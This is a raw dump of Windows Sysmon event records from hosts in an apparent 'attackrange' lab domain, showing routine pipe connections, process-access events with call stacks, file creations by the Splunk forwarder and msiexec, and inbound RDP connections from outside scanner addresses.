18141800x800000000000000077019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-F60D-00000000BB01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050463Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:02.916{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECD595E103D149C2BA5A32A5235EFE65,SHA256=DC75E153D44F9874D67F2D8E198261E36598247156291C494B58976245EE484B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050462Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:59.552{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com57809-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050461Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:59.330{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57601-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050460Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:02.197{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F92E57C1B473D5CA8AA389D99F9D3BC,SHA256=41BCF3CC44D373064525AEE0C4C3A2D3310E7DE24B5AFFFAFCF4A0EAC347A3D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.936{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-120E-00000000BB01}712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.920{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-120E-00000000BB01}712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-120E-00000000BB01}712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.873{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-110E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.857{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-110E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.857{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-110E-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000077792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.811{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-100E-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.795{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-100E-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-100E-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000077789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0F0E-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.732{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0F0E-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.732{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0F0E-00000000BB01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000077785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.717{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI67C0.tmpMD5=9CADBFA797783FF9E7FC60301DE9E1FF,SHA256=C1EDA5C42BE64CFC08408A276340C9082F424EC1A4E96E78F85E9F80D0634141,IMPHASH=652859BF844DA7396CCD2DCBC07B8FD2truetrue 10341000x800000000000000077784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.701{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0E0E-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 